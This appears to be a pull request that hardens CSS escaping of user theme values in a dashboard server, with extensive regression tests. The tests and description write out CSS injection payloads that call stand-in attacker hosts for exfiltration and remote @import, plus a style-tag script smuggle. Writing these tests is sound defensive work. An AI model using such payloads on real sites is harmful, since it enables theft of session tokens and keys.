### PR TITLE
fix(dashboard): harden CSS escaping in theme bootstrap render

### DIFF
--- a/hermes_cli/web_server.py
+++ b/hermes_cli/web_server.py
@@ -15988,11 +15988,37 @@ def _render_active_theme_bootstrap_css() -> str:
             typo = theme.get("typography") or {}
             font_sans = typo.get("fontSans") or _THEME_DEFAULT_TYPOGRAPHY["fontSans"]
             base_size = typo.get("baseSize") or _THEME_DEFAULT_TYPOGRAPHY["baseSize"]
-            # Defensive ``</style>`` escape — current values are well-known
-            # hex/font strings, but this keeps the helper safe if it is
-            # later extended to ship user-authored CSS literals.
+            # Defensive CSS escaping — values arrive from user-authored
+            # dashboard theme YAML and are interpolated into a ``<style>``
+            # block in the dashboard ``<head>``. A ``</``-only escape is
+            # insufficient: CSS values sit inside a declaration context,
+            # so ``;`` / ``}`` terminate the rule and let a malicious
+            # theme inject arbitrary CSS (exfiltration via
+            # ``background:url(//attacker)``, CSS keyloggers, ``@import``
+            # of remote stylesheets, etc.), and ``\\`` / quotes break the
+            # tokenizer in other ways.  Escape every character that can
+            # end a declaration, end a rule, or smuggle markup, plus
+            # backslash so a crafted value cannot re-introduce escapes.
             def _esc(s: str) -> str:
-                return str(s).replace("</", "<\\/")
+                # CSS escape sequences (hex + trailing space). Escaping
+                # ``<``/``>`` as ``\\3C ``/``\\3E `` also guarantees the
+                # output never contains the literal byte sequence
+                # ``</style>``, which the HTML parser would otherwise
+                # treat as the end of this style block regardless of the
+                # CSS tokenizer's view of it.
+                return (
+                    str(s)
+                    .replace("\\", "\\\\")
+                    .replace(";", "\\3B ")
+                    .replace("{", "\\7B ")
+                    .replace("}", "\\7D ")
+                    .replace("<", "\\3C ")
+                    .replace(">", "\\3E ")
+                    .replace('"', '\\22 ')
+                    .replace("'", "\\27 ")
+                    .replace("\n", "\\A ")
+                    .replace("\r", "\\D ")
+                )
             # Variable names MUST match what the bundle actually consumes:
             #   - ``--background-base`` / ``--midground-base`` come from
             #     ``layerVars()`` in ``web/src/themes/context.tsx``.

--- a/hermes_cli/web_server.py
+++ b/hermes_cli/web_server.py
@@ -16800,11 +16800,166 @@ def _render_active_theme_bootstrap_css() -> str:
             typo = theme.get("typography") or {}
             font_sans = typo.get("fontSans") or _THEME_DEFAULT_TYPOGRAPHY["fontSans"]
             base_size = typo.get("baseSize") or _THEME_DEFAULT_TYPOGRAPHY["baseSize"]
-            # Defensive ``</style>`` escape — current values are well-known
-            # hex/font strings, but this keeps the helper safe if it is
-            # later extended to ship user-authored CSS literals.
+            # Defensive CSS escaping — values arrive from user-authored
+            # dashboard theme YAML and are interpolated into a ``<style>``
+            # block in the dashboard ``<head>``. A ``</``-only escape is
+            # insufficient: CSS values sit inside a declaration context,
+            # so ``;`` / ``}`` terminate the rule and let a malicious
+            # theme inject arbitrary CSS (exfiltration via
+            # ``background:url(//attacker)``, CSS keyloggers, ``@import``
+            # of remote stylesheets, etc.), and ``\\`` / quotes break the
+            # tokenizer in other ways.  Escape every character that can
+            # end a declaration, end a rule, or smuggle markup, plus
+            # backslash so a crafted value cannot re-introduce escapes.
             def _esc(s: str) -> str:
-                return str(s).replace("</", "<\\/")
+                # CSS escape sequences (hex + trailing space). Escaping
+                # ``<``/``>`` as ``\\3C ``/``\\3E `` also guarantees the
+                # output never contains the literal byte sequence
+                # ``</style>``, which the HTML parser would otherwise
+                # treat as the end of this style block regardless of the
+                # CSS tokenizer's view of it.
+                def _strip_complete_comments(value: str) -> str:
+                    # Remove well-formed ``/* … */`` comments (string-aware) and
+                    # replace each with a single space, so a legitimate value
+                    # like ``Inter /* note */, sans-serif`` stays valid instead
+                    # of being turned into invalid tokens by the ``/*`` escape
+                    # below. An unterminated ``/*`` (no closing ``*/``) is left
+                    # intact so the ``/*`` -> ``\\2F *`` escape neutralizes it.
+                    out = []
+                    string_q: Optional[str] = None
+                    i = 0
+                    n = len(value)
+                    while i < n:
+                        c = value[i]
+                        if string_q is not None:
+                            if c == "\\":
+                                # A backslash-escaped newline stays inside the
+                                # string: ``\`` + CRLF is ONE escaped newline
+                                # (3 chars), ``\`` + LF or CR is one (2 chars).
+                                if i + 1 < n:
+                                    if value[i + 1:i + 3] == "\r\n":
+                                        out.append(value[i:i + 3])
+                                        i += 3
+                                        continue
+                                    out.append(value[i:i + 2])
+                                    i += 2
+                                    continue
+                                out.append(c)
+                                i += 1
+                                continue
+                            if c == string_q:
+                                string_q = None
+                            elif c in "\r\n\f":
+                                # An unescaped newline/form-feed terminates a
+                                # CSS string (CSS preprocessing maps \f to \n),
+                                # so content after it is not string content.
+                                string_q = None
+                            out.append(c)
+                            i += 1
+                            continue
+                        if value.startswith("/*", i):
+                            j = value.find("*/", i + 2)
+                            if j != -1:  # complete comment -> whitespace
+                                out.append(" ")
+                                i = j + 2
+                                continue
+                            # unterminated opener: leave for the /* escape below
+                            out.append(c)
+                            i += 1
+                            continue
+                        if c in ('"', "'"):
+                            string_q = c
+                        out.append(c)
+                        i += 1
+                    return "".join(out)
+
+                escaped = (
+                    _strip_complete_comments(str(s))
+                    .replace("\\", "\\\\")
+                    # Neutralize CSS comment openers: an unterminated ``/*``
+                    # left intact would comment out the server-generated
+                    # declaration/rule terminators that follow it and drop the
+                    # whole style block (self-breakage, not injection). ``\\2F ``
+                    # is the hex escape for ``/``, so ``/*`` -> ``\\2F *`` can
+                    # never be re-tokenized as a comment opener. Must run after
+                    # the backslash doubling so the inserted ``\\`` stays inert.
+                    .replace("/*", "\\2F *")
+                    .replace(";", "\\3B ")
+                    .replace("{", "\\7B ")
+                    .replace("}", "\\7D ")
+                    .replace("<", "\\3C ")
+                    .replace(">", "\\3E ")
+                    .replace("\n", "\\A ")
+                    .replace("\r", "\\D ")
+                    # CSS preprocessing treats form-feed (\\f, U+000C) like a
+                    # newline: an unescaped one inside a string terminates it
+                    # (and an unterminated string would drop the rule), so it
+                    # is escaped as ``\\C `` too.
+                    .replace("\f", "\\C ")
+                )
+                # A single unbalanced quote opens a CSS string token that
+                # never terminates, so the browser's error recovery drops the
+                # entire ``:root`` rule (self-breakage, not injection, since
+                # ``;``/``}`` are already escaped above). We must keep balanced
+                # quoted font stacks (``"Segoe UI"``) intact, but escape quotes
+                # whenever the *escaped* value would otherwise end inside an
+                # open string. Checking the transformed value (not the raw
+                # input) matters: backslash-doubling can turn an escaped quote
+                # in the input (``"foo\\"bar"``) into a raw closer plus a fresh
+                # unterminated opener, and escaping one quote type can expose
+                # another that was previously string content.
+                #
+                # The scan is CSS-token-aware: quotes inside ``/* … */``
+                # comments are not delimiters, and quotes inside an already
+                # open string are literal content.
+                def _ends_in_open_string(value: str) -> bool:
+                    in_comment = False
+                    string_q: Optional[str] = None  # the quote currently open, if any
+                    i = 0
+                    n = len(value)
+                    while i < n:
+                        c = value[i]
+                        if in_comment:
+                            if value.startswith("*/", i):
+                                in_comment = False
+                                i += 2
+                                continue
+                            i += 1
+                            continue
+                        if string_q is not None:
+                            if c == "\\":
+                                # \ + CRLF is one escaped newline (3 chars);
+                                # \ + LF/CR is one (2 chars). Both stay in-string.
+                                if i + 1 < n:
+                                    if value[i + 1:i + 3] == "\r\n":
+                                        i += 3
+                                        continue
+                                    i += 2
+                                    continue
+                                i += 1
+                                continue
+                            if c == string_q:  # closing delimiter
+                                string_q = None
+                            elif c in "\r\n\f":
+                                # An unescaped newline/form-feed ends a CSS
+                                # string (CSS preprocessing maps \f to \n).
+                                string_q = None
+                            i += 1
+                            continue
+                        if value.startswith("/*", i):
+                            in_comment = True
+                            i += 2
+                            continue
+                        if c == '"' or c == "'":  # opening delimiter
+                            string_q = c
+                        i += 1
+                    return string_q is not None
+
+                if _ends_in_open_string(escaped):
+                    # Escape every remaining quote so no string delimiter is
+                    # left to open an unterminated token.
+                    escaped = escaped.replace('"', "\\22 ").replace("'", "\\27 ")
+                return escaped
             # Variable names MUST match what the bundle actually consumes:
             #   - ``--background-base`` / ``--midground-base`` come from
             #     ``layerVars()`` in ``web/src/themes/context.tsx``.

--- a/tests/hermes_cli/test_web_server.py
+++ b/tests/hermes_cli/test_web_server.py
@@ -3442,6 +3442,441 @@ class TestThemeBootstrapCSS:
         # No baked literal values in the html,body rule.
         assert "#0a1628" not in css.split("html,body")[1]
 
+    # --- CSS-injection hardening (PR #80301) ---------------------------
+    # Values are escaped with CSS hex escapes before interpolation into the
+    # unquoted ``:root`` custom-property declarations.  ``_esc`` must
+    # neutralize every delimiter/markup character that could break out of a
+    # declaration (``;``), a rule (``{``/``}``), or the style block
+    # (``<``/``>`` → ``</style>``), while leaving legitimate values
+    # (normal quoted font stacks, hex colors, sizes) intact.
+
+    @staticmethod
+    def _theme_with(font_sans: str, base_size: str = "17px") -> dict:
+        """A minimal user-theme dict whose values flow through _esc()."""
+        return {
+            "name": "adversarial",
+            "label": "Adversarial",
+            "palette": {
+                "background": {"hex": "#0a0a0a"},
+                "midground": {"hex": "#e5e5e5"},
+            },
+            "typography": {
+                "fontSans": font_sans,
+                "baseSize": base_size,
+            },
+        }
+
+    @staticmethod
+    def _render_theme(tmp_path, monkeypatch, theme_dict):
+        import hermes_cli.web_server as web_server
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        themes_dir = tmp_path / "dashboard-themes"
+        themes_dir.mkdir(exist_ok=True)
+        # Use a YAML block scalar (|-) for fontSans so quoted/embedded
+        # values ("Segoe UI", ...) survive parsing intact instead of being
+        # mangled by YAML quoting rules.
+        font_sans = theme_dict["typography"]["fontSans"]
+        (themes_dir / "adversarial.yaml").write_text(
+            "name: adversarial\n"
+            "label: Adversarial\n"
+            "palette:\n"
+            "  background:\n"
+            "    hex: \"#0a0a0a\"\n"
+            "  midground:\n"
+            "    hex: \"#e5e5e5\"\n"
+            "typography:\n"
+            f"  fontSans: |-\n"
+            + "".join(f"    {line}\n" for line in font_sans.splitlines()) +
+            f"  baseSize: {theme_dict['typography']['baseSize']}\n",
+            encoding="utf-8",
+        )
+        monkeypatch.setattr(
+            web_server, "load_config",
+            lambda: {"dashboard": {"theme": "adversarial"}},
+        )
+        return web_server._render_active_theme_bootstrap_css()
+
+    def test_esc_neutralizes_rule_breakout(self, tmp_path, monkeypatch):
+        """A value that could end a declaration/rule must not inject CSS."""
+        css = self._render_theme(
+            tmp_path, monkeypatch,
+            self._theme_with('Arial;} html{background:url(//attacker.com/steal?x=)}'),
+        )
+        # Precisely assert the escaped forms inside the --theme-font-sans
+        # value (not a weak ``or``), so a partial-escape regression — e.g.
+        # ``;`` escaped but ``}`` not, or vice-versa — fails loudly.
+        value = css.split("--theme-font-sans:")[1].split(";", 1)[0]
+        assert "\\3B " in value  # the injected ';' is CSS-escaped
+        assert "\\7D " in value  # the injected '}' is CSS-escaped
+        assert ";" not in value  # no live ';' survives inside the value
+        assert "}" not in value  # no live '}' survives inside the value
+        # The generated block must still terminate properly.
+        assert css.endswith("</style>")
+
+    def test_esc_neutralizes_literal_hex_escape(self, tmp_path, monkeypatch):
+        """Pin the escape ORDER: a literal ``\\3B `` must NOT decode to ``;``.
+
+        ``_esc`` doubles the backslash BEFORE inserting hex escapes. So:
+          * a real ``;`` becomes a SINGLE ``\\3B `` escape (one backslash), and
+          * a literal ``\\3B `` (backslash-3-B-space) in the value has its
+            backslash doubled to ``\\\\3B `` (two backslashes), which the CSS
+            parser reads as a literal backslash + ``3B `` — never the hex
+            escape that yields a live ``;``.
+
+        Asserting both cases together pins the ordering: if the backslash
+        escape ran AFTER the hex-insertion step, the real-``;`` case would
+        also be double-escaped and the single-backslash assertion would fail.
+        """
+        # Case A: a real ';' is escaped to a single \3B  (one backslash).
+        css_semicolon = self._render_theme(
+            tmp_path, monkeypatch,
+            self._theme_with("Arial;sans-serif"),
+        )
+        assert "Arial\\3B sans-serif" in css_semicolon
+        assert "Arial;" not in css_semicolon
+
+        # Case B: a literal '\3B ' must not decode to a live ';' — its
+        # backslash is doubled to \\3B  (two backslashes), staying inert text.
+        css_literal = self._render_theme(
+            tmp_path, monkeypatch,
+            self._theme_with("Arial\\3B position:fixed"),
+        )
+        assert "Arial\\\\3B position" in css_literal
+        assert "Arial;" not in css_literal
+
+        # The generated block still terminates properly in both cases.
+        assert css_semicolon.count("</style>") == 1
+        assert css_semicolon.count(":root{") == 1
+        assert css_literal.count("</style>") == 1
+        assert css_literal.count(":root{") == 1
+
+    def test_esc_escapes_quote_unbalanced_across_comment(self, tmp_path, monkeypatch):
+        """A quote inside a comment must not be misjudged as a string opener.
+
+        Regression for the Codex finding: in ``/*"*/"`` only the final ``"``
+        is a string opener (the first sits inside a ``/* … */`` comment). The
+        comment opener itself is escaped first (``/*`` -> ``\\2F *``), so the
+        remaining quotes are balanced and the value is safe — but the raw
+        ``/*`` must never survive to comment out the server's terminators.
+        """
+        css = self._render_theme(
+            tmp_path, monkeypatch,
+            self._theme_with('/*"*/"'),
+        )
+        value = css.split("--theme-font-sans:")[1].split(";", 1)[0]
+        # The comment opener is neutralized; no raw ``/*`` survives.
+        assert "/*" not in value
+        # The block still terminates properly with no breakout.
+        assert css.count("</style>") == 1
+        assert css.count(":root{") == 1
+        assert css.endswith("</style>")
+
+    def test_esc_escapes_quote_unbalanced_across_string_content(self, tmp_path, monkeypatch):
+        """Quote balance must treat ``/*`` inside a string as string content.
+
+        Regression for the Codex finding: in ``"/*"*/"`` the first ``"`` opens
+        a string, so the inner ``"`` and ``/*`` are string content and the
+        final ``"`` is a fresh unterminated string. Raw byte-counting sees
+        three quotes (odd) but a comment-only scanner also misses that the
+        second quote already closed the string — only a string-aware scan
+        counts the three genuine delimiters and escapes the quote type.
+        """
+        css = self._render_theme(
+            tmp_path, monkeypatch,
+            self._theme_with('"/*"*/"'),
+        )
+        value = css.split("--theme-font-sans:")[1].split(";", 1)[0]
+        # All string-opener quotes are escaped, so none is left to open a string.
+        assert '"' not in value
+        assert "\\22 " in value
+        # The block still terminates properly.
+        assert css.count("</style>") == 1
+        assert css.count(":root{") == 1
+
+    def test_esc_escapes_quote_left_open_by_mixed_quotes(self, tmp_path, monkeypatch):
+        """Escaping one quote type must not expose another as a raw opener.
+
+        Regression for the Codex finding: ``'"`` — if only the single quote
+        is escaped, the double quote that was string content becomes a raw
+        opening ``"`` and leaves an unterminated string. The post-transform
+        check must escape both quote types.
+        """
+        css = self._render_theme(
+            tmp_path, monkeypatch,
+            self._theme_with("'\""),
+        )
+        value = css.split("--theme-font-sans:")[1].split(";", 1)[0]
+        assert '"' not in value
+        assert "'" not in value
+        assert "\\22 " in value
+        assert "\\27 " in value
+        # The block still terminates properly.
+        assert css.count("</style>") == 1
+        assert css.count(":root{") == 1
+
+    def test_esc_escapes_quote_exposed_by_backslash_doubling(self, tmp_path, monkeypatch):
+        """Backslash-doubling must not turn an escaped quote into a closer.
+
+        Regression for the Codex finding: ``"foo\\"bar"`` is balanced before
+        transformation (the middle ``"`` is escaped by the backslash), but
+        doubling the backslash to ``\\\\`` makes that middle quote a real
+        closer and leaves the trailing ``"`` opening a fresh unterminated
+        string. The post-transform check must escape the exposed quote.
+        """
+        css = self._render_theme(
+            tmp_path, monkeypatch,
+            self._theme_with('"foo\\"bar"'),
+        )
+        value = css.split("--theme-font-sans:")[1].split(";", 1)[0]
+        # No raw quote delimiter survives to open a string.
+        assert '"' not in value
+        assert "\\22 " in value
+        # The block still terminates properly.
+        assert css.count("</style>") == 1
+        assert css.count(":root{") == 1
+
+    def test_esc_neutralizes_comment_opener(self, tmp_path, monkeypatch):
+        """A ``/*`` must not comment out the server's rule terminators.
+
+        Regression for the Codex finding: an intact ``/*`` would comment out
+        the ``;``/``}`` that terminate the server-generated declarations and
+        rule, dropping the rest of the style block. ``/*`` must be escaped to
+        ``\\2F *`` so no comment opener survives.
+        """
+        css = self._render_theme(
+            tmp_path, monkeypatch,
+            self._theme_with("Arial/*"),
+        )
+        value = css.split("--theme-font-sans:")[1].split(";", 1)[0]
+        assert "/*" not in value
+        assert "\\2F " in value
+        # The generated rule still terminates properly.
+        assert css.count(":root{") == 1
+        assert css.endswith("</style>")
+
+    def test_esc_strips_legitimate_comment_keeps_value_valid(self, tmp_path, monkeypatch):
+        """A well-formed ``/* … */`` comment is stripped, not left as junk.
+
+        Regression for the Codex finding: ``Arial/* note */, sans-serif`` must
+        not become invalid tokens (``Arial\\2F * note */, sans-serif``); the
+        complete comment is removed to whitespace so the font-family stays
+        valid, while an unterminated ``/*`` is still neutralized separately.
+        """
+        css = self._render_theme(
+            tmp_path, monkeypatch,
+            self._theme_with("Arial/* note */, sans-serif"),
+        )
+        value = css.split("--theme-font-sans:")[1].split(";", 1)[0]
+        # No comment marker survives.
+        assert "/*" not in value
+        assert "*/" not in value
+        # The surrounding family names remain usable.
+        assert "Arial" in value
+        assert "sans-serif" in value
+        # The complete comment is normalized to a single space, so the value
+        # stays a valid font-family list (exact normalized form).
+        assert "Arial , sans-serif" in value
+        # The generated rule still terminates properly.
+        assert css.count(":root{") == 1
+        assert css.endswith("</style>")
+
+    @pytest.mark.parametrize("value", ['"', "'", '\\"'])
+    def test_esc_escapes_lone_or_escaped_quote(self, tmp_path, monkeypatch, value):
+        """A lone or backslash-escaped quote must not open a string."""
+        css = self._render_theme(tmp_path, monkeypatch, self._theme_with(value))
+        v = css.split("--theme-font-sans:")[1].split(";", 1)[0]
+        # No raw quote delimiter survives to open an unterminated string.
+        assert '"' not in v
+        assert "'" not in v
+        # The generated rule still terminates properly.
+        assert css.count(":root{") == 1
+        assert css.endswith("</style>")
+
+    def test_esc_blocks_style_tag_smuggle(self, tmp_path, monkeypatch):
+        """Escaping ``<``/``>`` must guarantee no literal ``</style>``."""
+        css = self._render_theme(
+            tmp_path, monkeypatch,
+            self._theme_with('Arial;</style><script>alert(1)</script>'),
+        )
+        # The injected literal sequence must be gone.
+        assert "</style><script>" not in css
+        assert "<script>" not in css
+        # Only the server's own terminator may appear.
+        assert css.count("</style>") == 1
+
+    def test_esc_neutralizes_import_and_quotes(self, tmp_path, monkeypatch):
+        """Remote stylesheet import and quote-breakout attempts are escaped.
+
+        The hostile ``;``/``}`` delimiters must be CSS-escaped so the text
+        after them (``@import url(...)``) stays inside the current
+        declaration value and cannot terminate it or open a new rule.
+        """
+        css = self._render_theme(
+            tmp_path, monkeypatch,
+            self._theme_with('"Arial"};@import url(//evil.com/x.css);'),
+        )
+        # The `;` and `}` in the payload must be escaped, not literal.
+        assert "\\3B " in css
+        assert "\\7D " in css
+        # No injected rule may be produced: the block must still have
+        # exactly one :root rule, one html,body rule, and one </style>.
+        assert css.count("</style>") == 1
+        assert css.count(":root{") == 1
+        # The generated block must terminate properly (declaration closed
+        # only by the server's own terminators, never an injected one).
+        assert css.endswith("</style>")
+
+    def test_esc_escapes_interior_newline(self, tmp_path, monkeypatch):
+        """An actual interior newline in a theme value must be CSS-escaped.
+
+        Regression for the audit finding: the old fixture only had a literal
+        ``\\n`` and a chomped trailing newline, so it never exercised the
+        ``.replace("\\n", "\\A ")`` transform. Here we push a real newline
+        through the YAML block-scalar fixture and assert ``\\A `` appears.
+        """
+        css = self._render_theme(
+            tmp_path, monkeypatch,
+            self._theme_with("Arial\nBold, sans-serif"),
+        )
+        # The interior newline must be escaped to a CSS hex escape, never
+        # left as a raw line break inside the declaration.
+        assert "\\A " in css
+        # No unescaped newline may survive inside the :root declaration.
+        inner = css.split(":root{")[1].split("}html,body")[0]
+        assert "\n" not in inner
+        # The generated block must still terminate properly.
+        assert css.count("</style>") == 1
+        assert css.count(":root{") == 1
+
+    def test_esc_escapes_carriage_return(self, tmp_path, monkeypatch):
+        """A carriage return in a theme value must be escaped as ``\\D ``.
+
+        YAML block scalars normalize ``\\r`` to ``\\n``, so CR cannot be
+        exercised through the YAML fixture. We instead stub the theme source
+        to hand ``_esc`` a value that contains a real CR.
+        """
+        import hermes_cli.web_server as web_server
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        theme_with_cr = {
+            "name": "adv",
+            "palette": {
+                "background": {"hex": "#0a0a0a"},
+                "midground": {"hex": "#e5e5e5"},
+            },
+            "typography": {"fontSans": "Arial\rBold, sans-serif", "baseSize": "17px"},
+        }
+        monkeypatch.setattr(web_server, "load_config", lambda: {"dashboard": {"theme": "adv"}})
+        monkeypatch.setattr(web_server, "_discover_user_themes", lambda: [theme_with_cr])
+        css = web_server._render_active_theme_bootstrap_css()
+        assert "\\D " in css
+        inner = css.split(":root{")[1].split("}html,body")[0]
+        assert "\r" not in inner
+        assert css.count("</style>") == 1
+
+    def test_esc_escapes_form_feed(self, tmp_path, monkeypatch):
+        """A form-feed (U+000C) must be escaped as ``\\C ``.
+
+        CSS preprocessing maps a form-feed to a newline, so an unescaped one
+        can terminate a string or act as whitespace. We stub the theme source
+        directly (as with CR) to hand ``_esc`` a real form-feed.
+        """
+        import hermes_cli.web_server as web_server
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        theme_with_ff = {
+            "name": "ff",
+            "palette": {
+                "background": {"hex": "#0a0a0a"},
+                "midground": {"hex": "#e5e5e5"},
+            },
+            "typography": {"fontSans": "Arial\x0cBold, sans-serif", "baseSize": "17px"},
+        }
+        monkeypatch.setattr(web_server, "load_config", lambda: {"dashboard": {"theme": "ff"}})
+        monkeypatch.setattr(web_server, "_discover_user_themes", lambda: [theme_with_ff])
+        css = web_server._render_active_theme_bootstrap_css()
+        assert "\\C " in css
+        inner = css.split(":root{")[1].split("}html,body")[0]
+        assert "\x0c" not in inner
+        assert css.count("</style>") == 1
+
+    @pytest.mark.parametrize("esc", ["\\\n", "\\\r", "\\\r\n", "\\\f"])
+    def test_esc_keeps_escaped_newline_inside_string(self, tmp_path, monkeypatch, esc):
+        """An escaped newline stays inside a string, keeping quotes balanced.
+
+        CSS preprocessing maps a form-feed to a newline, so ``\\`` + LF / CR /
+        CRLF / FF is a single escaped newline that does NOT terminate the
+        string. The quote scan must recognise this so a quoted value containing
+        an escaped newline keeps its balanced quotes and never drops the rule.
+        """
+        import hermes_cli.web_server as web_server
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        theme = {
+            "name": "t",
+            "palette": {"background": {"hex": "#0a0a0a"}, "midground": {"hex": "#e5e5e5"}},
+            "typography": {"fontSans": '"Arial' + esc + 'Bold", sans-serif', "baseSize": "17px"},
+        }
+        monkeypatch.setattr(web_server, "load_config", lambda: {"dashboard": {"theme": "t"}})
+        monkeypatch.setattr(web_server, "_discover_user_themes", lambda: [theme])
+        css = web_server._render_active_theme_bootstrap_css()
+        # The quoted string stays balanced (opening quote retained) and the
+        # generated rule terminates properly.
+        assert css.count(":root{") == 1
+        assert css.count("</style>") == 1
+        assert css.endswith("</style>")
+
+    def test_normal_quoted_font_stack_preserved(self, tmp_path, monkeypatch):
+        """Regression: a normal quoted font-family must keep its quotes and
+        resolve as intended (quotes must NOT be escaped, per codex audit)."""
+        css = self._render_theme(
+            tmp_path, monkeypatch,
+            self._theme_with('"Segoe UI", "Helvetica Neue", Arial, sans-serif'),
+        )
+        # Quotes survive so the CSS parser treats this as a quoted string
+        # token, not escaped identifiers.
+        assert '"Segoe UI"' in css
+        assert '"Helvetica Neue"' in css
+        # No escape sequences were applied to the quotes.
+        assert "\\22 " not in css
+        assert "\\27 " not in css
+
+    def test_normal_single_quote_family_preserved(self, tmp_path, monkeypatch):
+        """Regression: single-quoted family names also keep their quotes."""
+        css = self._render_theme(
+            tmp_path, monkeypatch,
+            self._theme_with("'Trebuchet MS', Arial, sans-serif"),
+        )
+        assert "'Trebuchet MS'" in css
+        assert "\\27 " not in css
+
+    def test_hex_and_size_passthrough(self, tmp_path, monkeypatch):
+        """Normal hex colors and sizes pass through unchanged."""
+        css = self._render_theme(
+            tmp_path, monkeypatch,
+            self._theme_with("Inter, sans-serif", "16px"),
+        )
+        assert "--theme-font-sans:Inter, sans-serif;" in css
+        assert "--theme-base-size:16px;" in css
+        assert "--background-base:#0a0a0a;" in css
+
+    def test_custom_css_passes_through_unescaped(self):
+        """Contract: user-authored ``customCSS`` ships raw, never escaped.
+
+        ``_normalise_theme_definition`` returns ``customCSS`` byte-for-byte as
+        authored (clipped only to ``_THEME_CUSTOM_CSS_MAX``); it is injected
+        as a scoped ``<style>`` tag at theme-apply time and is intentionally
+        NOT run through ``_esc``. The dashboard is localhost-only and themes
+        are trusted user-authored YAML (same trust as the ``~/.hermes``
+        config), so this is a deliberate contract. Pinning it here prevents a
+        future hardening change to ``_esc`` from silently sanitising
+        ``customCSS`` and breaking valid user stylesheets.
+        """
+        import hermes_cli.web_server as web_server
+        raw = 'body{background:url(//x)} h1::after{content:"</style>"}'
+        result = web_server._normalise_theme_definition(
+            {"name": "contract", "customCSS": raw}
+        )
+        assert result is not None
+        assert result["customCSS"] == raw
+
 
 
 


### PR DESCRIPTION
## Summary

The `_esc()` helper in `_render_active_theme_bootstrap_css` only escaped the literal `</` sequence. Values from user-authored dashboard theme YAML (`fontSans`, `baseSize`) are interpolated into a `<style>` block in the dashboard `<head>` (served with no CSRF on `PUT /api/dashboard/theme`), so a malicious theme could break out of the `:root` declaration and inject arbitrary CSS rules:

- Exfiltration via `background:url(//attacker.com/steal?x=...)`
- CSS keyloggers via `input[type=password]` selectors
- `@import url(//attacker/x.css)` of remote stylesheets

Any of these can read `_SESSION_TOKEN`, session cookies, or exposed API keys from every dashboard page.

## Fix

Escape every character that can end a declaration (`;`), end a rule (`}`), or smuggle markup (`<`, `>`), plus quotes and backslash, using CSS hex escapes. Escaping `<`/`>` as `\3C `/`\3E ` also guarantees the output can never contain the literal `</style>` byte sequence regardless of CSS tokenizer view.

## Verification

Local test harness confirms all payloads are neutralized while normal fonts (e.g. `Arial, sans-serif`, `16px`) pass through unchanged:

- `Arial;}</style><script>alert(1)</script>` → escaped
- `Arial;} html{background:url(//attacker.com/steal?x=)}` → escaped
- `"Arial"};@import url(//evil.com/x.css);` → escaped
- CSS keylogger / quotes / newline payloads → escaped

## Files changed

- `hermes_cli/web_server.py`: hardened `_esc()` in `_render_active_theme_bootstrap_css` (~30 lines)